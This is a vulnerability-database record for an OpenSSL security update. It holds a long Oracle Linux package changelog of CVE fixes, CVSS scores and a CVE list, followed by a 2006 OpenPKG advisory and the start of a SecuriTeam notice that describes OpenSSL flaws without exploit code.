dependency (#481419)\n[0.9.8j-5]\n- add temporary triggerpostun to reinstate the symlinks\n[0.9.8j-4]\n- no pairwise key tests in non-fips mode (#479817)\n[0.9.8j-3]\n- even more robust test for the temporary symlinks\n[0.9.8j-2]\n- try to ensure the temporary symlinks exist\n[0.9.8j-1]\n- new upstream version with necessary soname bump (#455753)\n- temporarily provide symlink to old soname to make it possible to rebuild\n the dependent packages in rawhide\n- add eap-fast support (#428181)\n- add possibility to disable zlib by setting\n- add fips mode support for testing purposes\n- do not null dereference on some invalid smime files\n- add buildrequires pkgconfig (#479493)\n[0.9.8g-11]\n- do not add tls extensions to server hello for SSLv3 either\n[0.9.8g-10]\n- move root CA bundle to ca-certificates package\n[0.9.8g-9]\n- fix CVE-2008-0891 - server name extension crash (#448492)\n- fix CVE-2008-1672 - server key exchange message omit crash (#448495)\n[0.9.8g-8]\n- super-H arch support\n- drop workaround for bug 199604 as it should be fixed in gcc-4.3\n[0.9.8g-7]\n- sparc handling\n[0.9.8g-6]\n- update to new root CA bundle from mozilla.org (r1.45)\n[0.9.8g-5]\n- Autorebuild for GCC 4.3\n[0.9.8g-4]\n- merge review fixes (#226220)\n- adjust the SHLIB_VERSION_NUMBER to reflect library name (#429846)\n[0.9.8g-3]\n- set default paths when no explicit paths are set (#418771)\n- do not add tls extensions to client hello for SSLv3 (#422081)\n[0.9.8g-2]\n- enable some new crypto algorithms and features\n- add some more important bug fixes from openssl CVS\n[0.9.8g-1]\n- update to latest upstream release, SONAME bumped to 7\n[0.9.8b-17]\n- update to new CA bundle from mozilla.org\n[0.9.8b-16]\n- fix CVE-2007-5135 - off-by-one in SSL_get_shared_ciphers (#309801)\n- fix CVE-2007-4995 - out of order DTLS fragments buffer overflow (#321191)\n- add alpha sub-archs (#296031)\n[0.9.8b-15]\n- rebuild\n[0.9.8b-14]\n- use localhost in testsuite, hopefully fixes slow build in koji\n- CVE-2007-3108 - fix side channel attack on private keys (#250577)\n- make ssl session cache id matching strict (#233599)\n[0.9.8b-13]\n- allow building on ARM architectures (#245417)\n- use reference timestamps to prevent multilib conflicts (#218064)\n- -devel package must require pkgconfig (#241031)\n[0.9.8b-12]\n- detect duplicates in add_dir properly (#206346)\n[0.9.8b-11]\n- the previous change still didn't make X509_NAME_cmp transitive\n[0.9.8b-10]\n- make X509_NAME_cmp transitive otherwise certificate lookup\n is broken (#216050)\n[0.9.8b-9]\n- aliasing bug in engine loading, patch by IBM (#213216)\n[0.9.8b-8]\n- CVE-2006-2940 fix was incorrect (#208744)\n[0.9.8b-7]\n- fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n- fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n- fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n- fix CVE-2006-4343 - sslv2 client DoS (#206940)\n[0.9.8b-6]\n- fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures (#205180)\n[0.9.8b-5]\n- set buffering to none on stdio/stdout FILE when bufsize is set (#200580)\n patch by IBM\n[0.9.8b-4.1]\n- rebuild with new binutils (#200330)\n[0.9.8b-4]\n- add a temporary workaround for sha512 test failure on s390 (#199604)\n* Thu Jul 20 2006 Tomas Mraz \n- add ipv6 support to s_client and s_server (by Jan Pazdziora) (#198737)\n- add patches for BN threadsafety, AES cache collision attack hazard fix and\n pkcs7 code memleak fix from upstream CVS\n[0.9.8b-3.1]\n- rebuild\n[0.9.8b-3]\n- dropped libica and ica engine from build\n* Wed Jun 21 2006 Joe Orton \n- update to new CA bundle from mozilla.org; adds CA certificates\n from netlock.hu and startcom.org\n[0.9.8b-2]\n- fixed a few rpmlint warnings\n- better fix for #173399 from upstream\n- upstream fix for pkcs12\n[0.9.8b-1]\n- upgrade to new version, stays ABI compatible\n- there is no more linux/config.h (it was empty anyway)\n[0.9.8a-6]\n- fix stale open handles in libica (#177155)\n- fix build if 'rand' or 'passwd' in buildroot path (#178782)\n- initialize VIA Padlock engine (#186857)\n[0.9.8a-5.2]\n- bump again for double-long bug on ppc(64)\n[0.9.8a-5.1]\n- rebuilt for new gcc4.1 snapshot and glibc changes\n[0.9.8a-5]\n- don't include SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG\n in SSL_OP_ALL (#175779)\n* Fri Dec 09 2005 Jesse Keating \n- rebuilt\n[0.9.8a-4]\n- fix build (-lcrypto was erroneusly dropped) of the updated libica\n- updated ICA engine to 1.3.6-rc3\n[0.9.8a-3]\n- disable builtin compression methods for now until they work\n properly (#173399)\n[0.9.8a-2]\n- don't set -rpath for openssl binary\n[0.9.8a-1]\n- new upstream version\n- patches partially renumbered\n[0.9.7f-11]\n- updated IBM ICA engine library and patch to latest upstream version\n[0.9.7f-10]\n- fix CAN-2005-2969 - remove SSL_OP_MSIE_SSLV2_RSA_PADDING which\n disables the countermeasure against man in the middle attack in SSLv2\n (#169863)\n- use sha1 as default for CA and cert requests - CAN-2005-2946 (#169803)\n[0.9.7f-9]\n- add *.so.soversion as symlinks in /lib (#165264)\n- remove unpackaged symlinks (#159595)\n- fixes from upstream (constant time fixes for DSA,\n bn assembler div on ppc arch, initialize memory on realloc)\n[0.9.7f-8]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7f-7]\n- fix CAN-2005-0109 - use constant time/memory access mod_exp\n so bits of private key aren't leaked by cache eviction (#157631)\n- a few more fixes from upstream 0.9.7g\n[0.9.7f-6]\n- use poll instead of select in rand (#128285)\n- fix Makefile.certificate to point to /etc/pki/tls\n- change the default string mask in ASN1 to PrintableString+UTF8String\n[0.9.7f-5]\n- update to revision 1.37 of Mozilla CA bundle\n[0.9.7f-4]\n- move certificates to _sysconfdir/pki/tls (#143392)\n- move CA directories to _sysconfdir/pki/CA\n- patch the CA script and the default config so it points to the\n CA directories\n[0.9.7f-3]\n- uninitialized variable mustn't be used as input in inline\n assembly\n- reenable the x86_64 assembly again\n[0.9.7f-2]\n- add back RC4_CHAR on ia64 and x86_64 so the ABI isn't broken\n- disable broken bignum assembly on x86_64\n[0.9.7f-1]\n- reenable optimizations on ppc64 and assembly code on ia64\n- upgrade to new upstream version (no soname bump needed)\n- disable thread test - it was testing the backport of the\n RSA blinding - no longer needed\n- added support for changing serial number to\n Makefile.certificate (#151188)\n- make ca-bundle.crt a config file (#118903)\n[0.9.7e-3]\n- libcrypto shouldn't depend on libkrb5 (#135961)\n[0.9.7e-2]\n- rebuild\n[0.9.7e-1]\n- new upstream source, updated patches\n- added patch so we are hopefully ABI compatible with upcoming\n 0.9.7f\n* Thu Feb 10 2005 Tomas Mraz \n- Support UTF-8 charset in the Makefile.certificate (#134944)\n- Added cmp to BuildPrereq\n[0.9.7a-46]\n- generate new ca-bundle.crt from Mozilla certdata.txt (revision 1.32)\n[0.9.7a-45]\n- Fixed and updated libica-1.3.4-urandom.patch patch (#122967)\n[0.9.7a-44]\n- rebuild\n[0.9.7a-43]\n- rebuild\n[0.9.7a-42]\n- rebuild\n[0.9.7a-41]\n- remove der_chop, as upstream cvs has done (CAN-2004-0975, #140040)\n[0.9.7a-40]\n- Include latest libica version with important bugfixes\n* Tue Jun 15 2004 Elliot Lee \n- rebuilt\n[0.9.7a-38]\n- Updated ICA engine IBM patch to latest upstream version.\n[0.9.7a-37]\n- build for linux-alpha-gcc instead of alpha-gcc on alpha (Jeff Garzik)\n[0.9.7a-36]\n- handle %{_arch}=i486/i586/i686/athlon cases in the intermediate\n header (#124303)\n[0.9.7a-35]\n- add security fixes for CAN-2004-0079, CAN-2004-0112\n* Tue Mar 16 2004 Phil Knirsch \n- Fixed libica filespec.\n[0.9.7a-34]\n- ppc/ppc64 define __powerpc__/__powerpc64__, not __ppc__/__ppc64__, fix\n the intermediate header\n[0.9.7a-33]\n- add an intermediate \n which points to the right\n arch-specific opensslconf.h on multilib arches\n* Tue Mar 02 2004 Elliot Lee \n- rebuilt\n[0.9.7a-32]\n- Updated libica to latest upstream version 1.3.5.\n[0.9.7a-31]\n- Update ICA crypto engine patch from IBM to latest version.\n* Fri Feb 13 2004 Elliot Lee \n- rebuilt\n[0.9.7a-29]\n- rebuilt\n[0.9.7a-28]\n- Fixed libica build.\n* Wed Feb 04 2004 Nalin Dahyabhai \n- add '-ldl' to link flags added for Linux-on-ARM (#99313)\n[0.9.7a-27]\n- updated ca-bundle.crt: removed expired GeoTrust roots, added\n freessl.com root, removed trustcenter.de Class 0 root\n[0.9.7a-26]\n- Fix link line for libssl (bug #111154).\n[0.9.7a-25]\n- add dependency on zlib-devel for the -devel package, which depends on zlib\n symbols because we enable zlib for libssl (#102962)\n[0.9.7a-24]\n- Use /dev/urandom instead of PRNG for libica.\n- Apply libica-1.3.5 fix for /dev/urandom in icalinux.c\n- Use latest ICA engine patch from IBM.\n[0.9.7a-22.1]\n- rebuild\n[0.9.7a-22]\n- rebuild (22 wasn't actually built, fun eh?)\n[0.9.7a-23]\n- re-disable optimizations on ppc64\n* Tue Sep 30 2003 Joe Orton \n- add a_mbstr.c fix for 64-bit platforms from CVS\n[0.9.7a-22]\n- add -Wa,--noexecstack to RPM_OPT_FLAGS so that assembled modules get tagged\n as not needing executable stacks\n[0.9.7a-21]\n- rebuild\n* Thu Sep 25 2003 Nalin Dahyabhai \n- re-enable optimizations on ppc64\n* Thu Sep 25 2003 Nalin Dahyabhai \n- remove exclusivearch\n[0.9.7a-20]\n- only parse a client cert if one was requested\n- temporarily exclusivearch for %{ix86}\n* Tue Sep 23 2003 Nalin Dahyabhai \n- add security fixes for protocol parsing bugs (CAN-2003-0543, CAN-2003-0544)\n and heap corruption (CAN-2003-0545)\n- update RHNS-CA-CERT files\n- ease back on the number of threads used in the threading test\n[0.9.7a-19]\n- rebuild to fix gzipped file md5sums (#91211)\n[0.9.7a-18]\n- Updated libica to version 1.3.4.\n[0.9.7a-17]\n- rebuild\n[0.9.7a-10.9]\n- free the kssl_ctx structure when we free an SSL structure (#99066)\n[0.9.7a-16]\n- rebuild\n[0.9.7a-15]\n- lower thread test count on s390x\n[0.9.7a-14]\n- rebuild\n[0.9.7a-13]\n- disable assembly on arches where it seems to conflict with threading\n[0.9.7a-12]\n- Updated libica to latest upstream version 1.3.0\n[0.9.7a-9.9]\n- rebuild\n[0.9.7a-11]\n- rebuild\n[0.9.7a-10]\n- ubsec: don't stomp on output data which might also be input data\n[0.9.7a-9]\n- temporarily disable optimizations on ppc64\n* Mon Jun 09 2003 Nalin Dahyabhai \n- backport fix for engine-used-for-everything from 0.9.7b\n- backport fix for prng not being seeded causing problems, also from 0.9.7b\n- add a check at build-time to ensure that RSA is thread-safe\n- keep perlpath from stomping on the libica configure scripts\n* Fri Jun 06 2003 Nalin Dahyabhai \n- thread-safety fix for RSA blinding\n[0.9.7a-8]\n- rebuilt\n[0.9.7a-7]\n- Added libica-1.2 to openssl (featurerequest).\n[0.9.7a-6]\n- fix building with incorrect flags on ppc64\n[0.9.7a-5]\n- add patch to harden against Klima-Pokorny-Rosa extension of Bleichenbacher's\n attack (CAN-2003-0131)\n[ 0.9.7a-4]\n- add patch to enable RSA blinding by default, closing a timing attack\n (CAN-2003-0147)\n[0.9.7a-3]\n- disable use of BN assembly module on x86_64, but continue to allow inline\n assembly (#83403)\n[0.9.7a-2]\n- disable EC algorithms\n[0.9.7a-1]\n- update to 0.9.7a\n[0.9.7-8]\n- add fix to guard against attempts to allocate negative amounts of memory\n- add patch for CAN-2003-0078, fixing a timing attack\n[0.9.7-7]\n- Add openssl-ppc64.patch\n[0.9.7-6]\n- EVP_DecryptInit should call EVP_CipherInit() instead of EVP_CipherInit_ex(),\n to get the right behavior when passed uninitialized context structures\n (#83766)\n- build with -mcpu=ev5 on alpha family (#83828)\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[0.9.7-4]\n- Added IBM hw crypto support patch.\n* Wed Jan 15 2003 Nalin Dahyabhai \n- add missing builddep on sed\n[0.9.7-3]\n- debloat\n- fix broken manpage symlinks\n[0.9.7-2]\n- fix double-free in 'openssl ca'\n[0.9.7-1]\n- update to 0.9.7 final\n[0.9.7-0]\n- update to 0.9.7 beta6 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n* Wed Dec 11 2002 Nalin Dahyabhai \n- update to 0.9.7 beta5 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n[0.9.6b-30]\n- add configuration stanza for x86_64 and use it on x86_64\n- build for linux-ppc on ppc\n- start running the self-tests again\n[0.9.6b-29hammer.3]\n- Merge fixes from previous hammer packages, including general x86-64 and\n multilib\n[0.9.6b-29]\n- rebuild\n[0.9.6b-28]\n- update asn patch to fix accidental reversal of a logic check\n[0.9.6b-27]\n- update asn patch to reduce chance that compiler optimization will remove\n one of the added tests\n[0.9.6b-26]\n- rebuild\n[0.9.6b-25]\n- add patch to fix ASN.1 vulnerabilities\n[0.9.6b-24]\n- add backport of Ben Laurie's patches for OpenSSL 0.9.6d\n[0.9.6b-23]\n- own {_datadir}/ssl/misc\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated rebuild\n[0.9.6b-20]\n- free ride through the build system (whee!)\n[0.9.6b-19]\n- rebuild in new environment\n[0.9.6b-17, 0.9.6b-18]\n- merge RHL-specific bits into stronghold package, rename\n[stronghold-0.9.6c-2]\n- add support for Chrysalis Luna token\n* Tue Mar 26 2002 Gary Benson \n- disable AEP random number generation, other AEP fixes\n[0.9.6b-15]\n- only build subpackages on primary arches\n[0.9.6b-13]\n- on ia32, only disable use of assembler on i386\n- enable assembly on ia64\n[0.9.6b-11]\n- fix sparcv9 entry\n[stronghold-0.9.6c-1]\n- upgrade to 0.9.6c\n- bump BuildArch to i686 and enable assembler on all platforms\n- synchronise with shrimpy and rawhide\n- bump soversion to 3\n* Wed Oct 10 2001 Florian La Roche \n- delete BN_LLONG for s390x, patch from Oliver Paukstadt\n[0.9.6b-9]\n- update AEP driver patch\n* Mon Sep 10 2001 Nalin Dahyabhai \n- adjust RNG disabling patch to match version of patch from Broadcom\n[0.9.6b-8]\n- disable the RNG in the ubsec engine driver\n[0.9.6b-7]\n- tweaks to the ubsec engine driver\n[0.9.6b-6]\n- tweaks to the ubsec engine driver\n[0.9.6b-5]\n- update ubsec engine driver from Broadcom\n[0.9.6b-4]\n- move man pages back to %{_mandir}/man?/foo.?ssl from\n %{_mandir}/man?ssl/foo.?\n- add an [ engine ] section to the default configuration file\n* Thu Aug 09 2001 Nalin Dahyabhai \n- add a patch for selecting a default engine in SSL_library_init()\n[0.9.6b-3]\n- add patches for AEP hardware support\n- add patch to keep trying when we fail to load a cert from a file and\n there are more in the file\n- add missing prototype for ENGINE_ubsec() in engine_int.h\n[0.9.6b-2]\n- actually add hw_ubsec to the engine list\n* Tue Jul 17 2001 Nalin Dahyabhai \n- add in the hw_ubsec driver from CVS\n[0.9.6b-1]\n- update to 0.9.6b\n* Thu Jul 05 2001 Nalin Dahyabhai \n- move .so symlinks back to %{_libdir}\n* Tue Jul 03 2001 Nalin Dahyabhai \n- move shared libraries to /lib (#38410)\n* Mon Jun 25 2001 Nalin Dahyabhai \n- switch to engine code base\n* Mon Jun 18 2001 Nalin Dahyabhai \n- add a script for creating dummy certificates\n- move man pages from %{_mandir}/man?/foo.?ssl to %{_mandir}/man?ssl/foo.?\n* Thu Jun 07 2001 Florian La Roche \n- add s390x support\n* Fri Jun 01 2001 Nalin Dahyabhai \n- change two memcpy() calls to memmove()\n- don't define L_ENDIAN on alpha\n[stronghold-0.9.6a-1]\n- Add 'stronghold-' prefix to package names.\n- Obsolete standard openssl packages.\n* Wed May 16 2001 Joe Orton \n- Add BuildArch: i586 as per Nalin's advice.\n* Tue May 15 2001 Joe Orton \n- Enable assembler on ix86 (using new .tar.bz2 which does\n include the asm directories).\n* Tue May 15 2001 Nalin Dahyabhai \n- make subpackages depend on the main package\n* Tue May 01 2001 Nalin Dahyabhai \n- adjust the hobble script to not disturb symlinks in include/ (fix from\n Joe Orton)\n* Fri Apr 27 2001 Nalin Dahyabhai \n- drop the m2crypo patch we weren't using\n* Tue Apr 24 2001 Nalin Dahyabhai \n- configure using 'shared' as well\n* Sun Apr 08 2001 Nalin Dahyabhai \n- update to 0.9.6a\n- use the build-shared target to build shared libraries\n- bump the soversion to 2 because we're no longer compatible with\n our 0.9.5a packages or our 0.9.6 packages\n- drop the patch for making rsatest a no-op when rsa null support is used\n- put all man pages into \nssl instead of \n- break the m2crypto modules into a separate package\n* Tue Mar 13 2001 Nalin Dahyabhai \n- use BN_LLONG on s390\n* Mon Mar 12 2001 Nalin Dahyabhai \n- fix the s390 changes for 0.9.6 (isn't supposed to be marked as 64-bit)\n* Sat Mar 03 2001 Nalin Dahyabhai \n- move c_rehash to the perl subpackage, because it's a perl script now\n* Fri Mar 02 2001 Nalin Dahyabhai \n- update to 0.9.6\n- enable MD2\n- use the libcrypto.so and libssl.so targets to build shared libs with\n- bump the soversion to 1 because we're no longer compatible with any of\n the various 0.9.5a packages circulating around, which provide lib*.so.0\n* Wed Feb 28 2001 Florian La Roche \n- change hobble-openssl for disabling MD2 again\n* Tue Feb 27 2001 Nalin Dahyabhai \n- re-disable MD2 -- the EVP_MD_CTX structure would grow from 100 to 152\n bytes or so, causing EVP_DigestInit() to zero out stack variables in\n apps built against a version of the library without it\n* Mon Feb 26 2001 Nalin Dahyabhai \n- disable some inline assembly, which on x86 is Pentium-specific\n- re-enable MD2 (see http://www.ietf.org/ietf/IPR/RSA-MD-all)\n* Thu Feb 08 2001 Florian La Roche \n- fix s390 patch\n* Fri Dec 08 2000 Than Ngo \n- added support s390\n* Mon Nov 20 2000 Nalin Dahyabhai \n- remove -Wa,* and -m* compiler flags from the default Configure file (#20656)\n- add the CA.pl man page to the perl subpackage\n* Thu Nov 02 2000 Nalin Dahyabhai \n- always build with -mcpu=ev5 on alpha\n* Tue Oct 31 2000 Nalin Dahyabhai \n- add a symlink from cert.pem to ca-bundle.crt\n* Wed Oct 25 2000 Nalin Dahyabhai \n- add a ca-bundle file for packages like Samba to reference for CA certificates\n* Tue Oct 24 2000 Nalin Dahyabhai \n- remove libcrypto's crypt(), which doesn't handle md5crypt (#19295)\n* Mon Oct 02 2000 Nalin Dahyabhai \n- add unzip as a buildprereq (#17662)\n- update m2crypto to 0.05-snap4\n* Tue Sep 26 2000 Bill Nottingham \n- fix some issues in building when it's not installed\n* Wed Sep 06 2000 Nalin Dahyabhai \n- make sure the headers we include are the ones we built with (aaaaarrgh!)\n* Fri Sep 01 2000 Nalin Dahyabhai \n- add Richard Henderson's patch for BN on ia64\n- clean up the changelog\n* Tue Aug 29 2000 Nalin Dahyabhai \n- fix the building of python modules without openssl-devel already installed\n* Wed Aug 23 2000 Nalin Dahyabhai \n- byte-compile python extensions without the build-root\n- adjust the makefile to not remove temporary files (like .key files when\n building .csr files) by marking them as .PRECIOUS\n* Sat Aug 19 2000 Nalin Dahyabhai \n- break out python extensions into a subpackage\n* Mon Jul 17 2000 Nalin Dahyabhai \n- tweak the makefile some more\n* Tue Jul 11 2000 Nalin Dahyabhai \n- disable MD2 support\n* Thu Jul 06 2000 Nalin Dahyabhai \n- disable MDC2 support\n* Sun Jul 02 2000 Nalin Dahyabhai \n- tweak the disabling of RC5, IDEA support\n- tweak the makefile\n* Thu Jun 29 2000 Nalin Dahyabhai \n- strip binaries and libraries\n- rework certificate makefile to have the right parts for Apache\n* Wed Jun 28 2000 Nalin Dahyabhai \n- use %{_perl} instead of /usr/bin/perl\n- disable alpha until it passes its own test suite\n* Fri Jun 09 2000 Nalin Dahyabhai \n- move the passwd.1 man page out of the passwd package's way\n* Fri Jun 02 2000 Nalin Dahyabhai \n- update to 0.9.5a, modified for U.S.\n- add perl as a build-time requirement\n- move certificate makefile to another package\n- disable RC5, IDEA, RSA support\n- remove optimizations for now\n* Wed Mar 01 2000 Florian La Roche \n- Bero told me to move the Makefile into this package\n* Wed Mar 01 2000 Florian La Roche \n- add lib*.so symlinks to link dynamically against shared libs\n* Tue Feb 29 2000 Florian La Roche \n- update to 0.9.5\n- run ldconfig directly in post/postun\n- add FAQ\n* Sat Dec 18 1999 Bernhard Rosenkrdnzer \n- Fix build on non-x86 platforms\n* Fri Nov 12 1999 Bernhard Rosenkrdnzer \n- move /usr/share/ssl/* from -devel to main package\n* Tue Oct 26 1999 Bernhard Rosenkrdnzer \n- inital packaging\n- changes from base:\n - Move /usr/local/ssl to /usr/share/ssl for FHS compliance\n - handle RPM_OPT_FLAGS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-16T00:00:00", "type": "oraclelinux", "title": "openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0078", "CVE-2003-0131", "CVE-2003-0147", "CVE-2003-0543", "CVE-2003-0544", "CVE-2003-0545", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0975", "CVE-2005-0109", "CVE-2005-2946", "CVE-2005-2969", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2007-3108", "CVE-2007-4995", "CVE-2007-5135", "CVE-2008-0891", "CVE-2008-1672", "CVE-2009-1377", "CVE-2009-1378", "CVE-2009-1379", "CVE-2009-3555", "CVE-2009-4355", "CVE-2010-0742", "CVE-2010-1633", "CVE-2010-3864", "CVE-2010-5298", "CVE-2011-0014", "CVE-2011-3207", "CVE-2011-4108", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4619", "CVE-2012-0050", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2333", "CVE-2012-4929", "CVE-2013-0166", "CVE-2013-0169", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2014-3505", "CVE-2014-3506", "CVE-2014-3507", "CVE-2014-3508", "CVE-2014-3509", "CVE-2014-3510", "CVE-2014-3511", "CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-8176", "CVE-2014-8275", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0209", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-3197", "CVE-2015-3216", "CVE-2015-4000", "CVE-2015-7575", "CVE-2016-0702", "CVE-2016-0705", "CVE-2016-0797", "CVE-2016-0799", "CVE-2016-2105", "CVE-2016-2106", "CVE-2016-2107", "CVE-2016-2108", "CVE-2016-2109", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6304", "CVE-2016-6306", "CVE-2016-8610", "CVE-2017-3731", "CVE-2018-0732", "CVE-2018-0737", "CVE-2018-0739", "CVE-2019-1559"], "modified": "2019-08-16T00:00:00", "id": "ELSA-2019-4747", "href": "http://linux.oracle.com/errata/ELSA-2019-4747.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n________________________________________________________________________\r\n\r\nOpenPKG Security Advisory The OpenPKG Project\r\nhttp://www.openpkg.org/security/ http://www.openpkg.org\r\nopenpkg-security@openpkg.org openpkg@openpkg.org\r\nOpenPKG-SA-2006.021 28-Sep-2006\r\n________________________________________________________________________\r\n\r\nPackage: openssl\r\nVulnerability: denial of service\r\nOpenPKG Specific: no\r\n\r\nAffected Releases: Affected Packages: Corrected Packages:\r\nOpenPKG CURRENT &lt;= openssl-0.9.8c-20060905 &gt;= openssl-0.9.8d-20060928\r\nOpenPKG 2-STABLE &lt;= openssl-0.9.8c-2.20060906 &gt;= openssl-0.9.8d-2.20060928\r\nOpenPKG 2.5-RELEASE &lt;= openssl-0.9.8a-2.5.2 &gt;= openssl-0.9.8a-2.5.3\r\n\r\nDescription:\r\n According to a vendor security advisory [0], four security issues\r\n were discovered in the cryptography and SSL/TLS toolkit OpenSSL [1]:\r\n\r\n 1. ASN.1 Denial of Service Attack &#40;1/2&#41;\r\n\r\n During the parsing of certain invalid ASN.1 structures an error\r\n condition is mishandled. This can result in an infinite loop which\r\n consumes system memory. The Common Vulnerabilities and Exposures\r\n &#40;CVE&#41; project assigned the id CVE-2006-2937 [2] to the problem.\r\n\r\n 2. ASN.1 Denial of Service Attack &#40;2/2&#41;\r\n\r\n Certain types of public key can take disproportionate amounts of\r\n time to process. This could be used by an attacker in a denial of\r\n service attack. The Common Vulnerabilities and Exposures &#40;CVE&#41;\r\n project assigned the id CVE-2006-2940 [3] to the problem.\r\n\r\n 3. SSL_get_shared_ciphers&#40;&#41; Buffer Overflow\r\n\r\n A buffer overflow was discovered in the SSL_get_shared_ciphers&#40;&#41;\r\n utility function. An attacker could send a list of ciphers to an\r\n application that uses this function and overrun a buffer. The\r\n Common Vulnerabilities and Exposures &#40;CVE&#41; project assigned the id\r\n CVE-2006-3780 [4] to the problem.\r\n\r\n 4. SSLv2 Client Crash\r\n \r\n A flaw in the SSLv2 client code was discovered. When a client\r\n application used OpenSSL to create an SSLv2 connection to a\r\n malicious server, that server could cause the client to crash. The\r\n Common Vulnerabilities and Exposures &#40;CVE&#41; project assigned the id\r\n CVE-2006-4343 [5] to the problem.\r\n________________________________________________________________________\r\n\r\nReferences:\r\n [0] http://www.openssl.org/news/secadv_20060928.txt \r\n [1] http://www.openssl.org/\r\n [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\r\n [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\r\n [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\r\n [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\r\n________________________________________________________________________\r\n\r\nFor security reasons, this advisory was digitally signed with the\r\nOpenPGP public key &quot;OpenPKG &lt;openpkg@openpkg.org&gt;&quot; &#40;ID 63C4CB9F&#41; of the\r\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\r\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org\r\nfor details on how to verify the integrity of this advisory.\r\n________________________________________________________________________\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nComment: OpenPKG &lt;openpkg@openpkg.org&gt;\r\n\r\niD8DBQFFG88pgHWT4GPEy58RAh8TAJ4/zpIxAmBkivnMe5QzGxHrJHhkbwCg15li\r\nsTSkwWgrJGLza3OQ/yQJSfs=\r\n=qyrR\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2006-09-29T00:00:00", "title": "[OpenPKG-SA-2006.021] OpenPKG Security Advisory &#40;openssl&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-3780", "CVE-2006-4343"], "modified": "2006-09-29T00:00:00", "id": "SECURITYVULNS:DOC:14486", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14486", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:08:11", "description": "Multiple DoS conditions in server and client functions, SSL_get_shared_ciphers&#40;&#41; buffer overflow.", "edition": 2, "cvss3": {}, "published": "2007-09-28T00:00:00", "title": "Multiple OpenSSL security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2006-4343"], "modified": "2007-09-28T00:00:00", "id": "SECURITYVULNS:VULN:6663", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6663", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:24", "description": "The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n OpenSSL SSLv2 Client Crash &#40;NULL Reference&#41;\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\nA vulnerability in the way OpenSSL handles 